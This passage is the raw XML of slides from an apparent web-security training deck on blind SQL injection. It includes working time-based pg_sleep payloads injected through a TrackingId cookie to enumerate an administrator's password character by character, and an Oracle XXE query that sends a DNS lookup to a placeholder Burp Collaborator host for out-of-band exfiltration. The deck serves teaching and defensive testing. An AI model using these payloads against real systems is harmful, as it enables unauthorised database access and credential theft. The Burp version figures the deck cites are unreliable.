          <p:cNvPr id="658" name="Google Shape;658;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="59688" l="2267" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="370275" y="1903725"/>
            <a:ext cx="8302151" cy="285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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638550" y="844600"/>
            <a:ext cx="7717500" cy="3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There are two main types of blind SQL injection:</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1. Boolean-Based Blind SQL Injection:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> In this type of attack, the attacker sends SQL queries to the application and observes the responses to determine if the query they injected is true or false. The attacker typically exploits vulnerabilities in the application to extract data or modify the database indirectly.</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2. Time-Based Blind SQL Injection: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In a time-based attack, the attacker injects malicious SQL code that causes the application to delay its response by a specified amount of time if the injected query is true. By carefully crafting the injected SQL code, the attacker can determine whether the condition they are testing for is met based on the delay in the application's response.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blind SQL injection attacks can be challenging to exploit because the attacker doesn't receive direct feedback from the application regarding the results of their queries. They must rely on the application's behavior, such as HTTP and HTTPS  response codes, response times, or error messages, to infer information about the underlying database. To prevent blind SQL injection, developers should validate and sanitize user input, use parameterized queries, and employ security mechanisms like Web Application Firewalls (WAFs) to detect and block malicious SQL injection attempts.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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="834475" y="462950"/>
            <a:ext cx="82167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                           Results:  Status code = 200 . No error. Character not matching</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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rPr lang="en" sz="1400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="664" name="Google Shape;664;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="53137" l="0" r="60496" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="463650" y="911325"/>
            <a:ext cx="8216702" cy="3873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84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="47750" l="0" r="46196" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="516950" y="1018025"/>
            <a:ext cx="8110099" cy="3784000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="670" name="Google Shape;670;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="823825" y="409775"/>
            <a:ext cx="75765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               Status code = 500 . Internal Server Error. Character Found</a:t>
            </a:r>
            <a:endParaRPr>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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3527750" y="452450"/>
            <a:ext cx="1671300" cy="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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Final Output:-</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="676" name="Google Shape;676;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5276" l="0" r="58957" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="375625" y="868850"/>
            <a:ext cx="8227474" cy="3894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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699900" y="1100625"/>
            <a:ext cx="78603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Previous technique for inducing conditional errors may not work.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>In this situation, it is often possible to exploit the blind SQL injection vulnerability by triggering time delays depending on whether an injected condition is true or false. As SQL queries are normally processed synchronously by the application, delaying the execution of a SQL query also delays the HTTP response. This allows you to determine the truth of the injected condition based on the time taken to receive the HTTP response.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>Query1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TrackingId=xyz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>'||pg_sleep(10)-- </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>the application takes 10 seconds to respond</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="682" name="Google Shape;682;p86"/>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Time based attacks</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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241400" y="602425"/>
            <a:ext cx="8612400" cy="398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688" name="Google Shape;688;p87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="241400" y="602425"/>
            <a:ext cx="8318774" cy="4045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8"/>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8"/>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695" name="Google Shape;695;p88"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="524125" y="322300"/>
            <a:ext cx="6774625" cy="2889950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="696" name="Google Shape;696;p88"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2544250" y="3318975"/>
            <a:ext cx="2738700" cy="1491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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549000" y="570900"/>
            <a:ext cx="8272200" cy="40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Query2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TrackingId=xyz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>‘%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--</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The application takes 10 seconds to respond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Query3:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TrackingId=xyz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--</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The application responds immediately with no time delay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Query4:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TrackingId=xyz'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--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IF delay occurs ,the condition is true, confirming that there is a user called administrator.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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247575" y="341450"/>
            <a:ext cx="8760900" cy="4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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Query5:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>TrackingId=xyz'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)&gt;1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--</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IF delay occurs condition is true, confirming that the password is greater than 1 character in length.</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After determining the length of the password, the next step is to test the character at each position to determine its value. This involves a much larger number of requests, so you need to use Burp Intruder.</a:t>
            </a:r>
            <a:endParaRPr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Query6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>TrackingId=xyz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--</a:t>
            </a:r>
            <a:endParaRPr sz="14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By using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> the SUBSTRING() function to extract a single character from the password, and test it against a specific value. Our attack will cycle through each position and possible value, testing each one in turn.</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rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>You should see a column in the results called "Response received". This will generally contain a small number, representing the number of milliseconds the application took to respond. One of the rows should have a larger number in this column, in the region of 10,000 milliseconds. </a:t>
            </a:r>
            <a:endParaRPr sz="1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13" name="Google Shape;713;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="513250" y="486950"/>
            <a:ext cx="7917501" cy="4169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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641850" y="761150"/>
            <a:ext cx="78603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p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>This specific method described  involves doing this " Blind SQL injection" in a way that doesn't immediately show any signs of an attack. The system still responds normally, so it's harder for the system to detect the intrusion. This makes it more challenging to exploit the vulnerability using traditional methods.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>To overcome this, there is   a clever approach using something called "out-of-band" interactions, which are like secret messages sent to another system controlled by the hacker. The hacker tricks the vulnerable system into sending these secret messages without anyone noticing.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="719" name="Google Shape;719;p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="863450" y="4489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Burpsuite?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Google Shape;490;p5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Burp Suite was first created by Dafydd Stuttard, a web application security expert. The tool was initially developed as a personal project to aid in his own web application security assessments and penetration testing.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In 2006, Burp Suite saw its first public release, making it available to a broader audience of security professionals and ethical hackers. This marked the beginning of its evolution into a widely recognized and trusted tool in the security community.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>current version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>burp suite</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>118.0.5993.117 for Mac / Linux </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>118.0.5993.90 for Windows.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burp Suite can be used to intercept, analyze, and manipulate both HTTP (unencrypted) and HTTPS (encrypted) traffic. It is not limited to only HTTP or HTTPS; it works with both protocols. </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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641850" y="581075"/>
            <a:ext cx="78603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
        <p:nvSpPr>
          <p:cNvPr id="725" name="Google Shape;725;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="863450" y="4489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pic>
        <p:nvPicPr>
          <p:cNvPr id="726" name="Google Shape;726;p93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="641850" y="1147975"/>
            <a:ext cx="7734524" cy="2835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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699900" y="1100625"/>
            <a:ext cx="7860300" cy="3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200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>One common way to do this is by using the Domain Name Service (DNS), which is a critical part of the internet's operation. Many networks allow DNS queries to be sent freely. The hacker uses a tool called "Burp Collaborator" to make the vulnerable system send DNS queries as part of its operation.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="732" name="Google Shape;732;p94"/>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ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699900" y="1100625"/>
            <a:ext cx="7860300" cy="3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hacker can then use this covert communication to slowly collect information from the hacked system, bit by bit. For example, they can steal user passwords. </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>This "out-of-band" technique is powerful because it's hard to detect, and it allows hackers to steal data without disrupting the target system. It's often preferred by attackers because it's more likely to succeed and provides a way to secretly steal valuable information.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Here we are just showing interaction of Database with the Burpsuite Collaborator</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>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sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="738" name="Google Shape;738;p95"/>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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699900" y="1100625"/>
            <a:ext cx="7860300" cy="3340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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS LOOKUP</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>SELECT EXTRACTVALUE(xmltype('&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://BURP-COLLABORATOR-SUBDOMAIN/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>&gt; %remote;]&gt;'),'/l') FROM dual</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rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://BURP-COLLABORATOR-SUBDOMAIN/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>"-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> This needs to be replaced by the payload generated by the Collaborator of Burp- Suite which is also a burp Collaborator Subdomain. like</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We will add it with the Cookie Tracking ID lets say we have burp collaborator subdomain as  cp5dabrggjp1lelmcffmpbx1lsrjf93y.oastify.com</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="744" name="Google Shape;744;p96"/>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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699900" y="1100625"/>
            <a:ext cx="7860300" cy="3340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t>Our new query would look like- </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
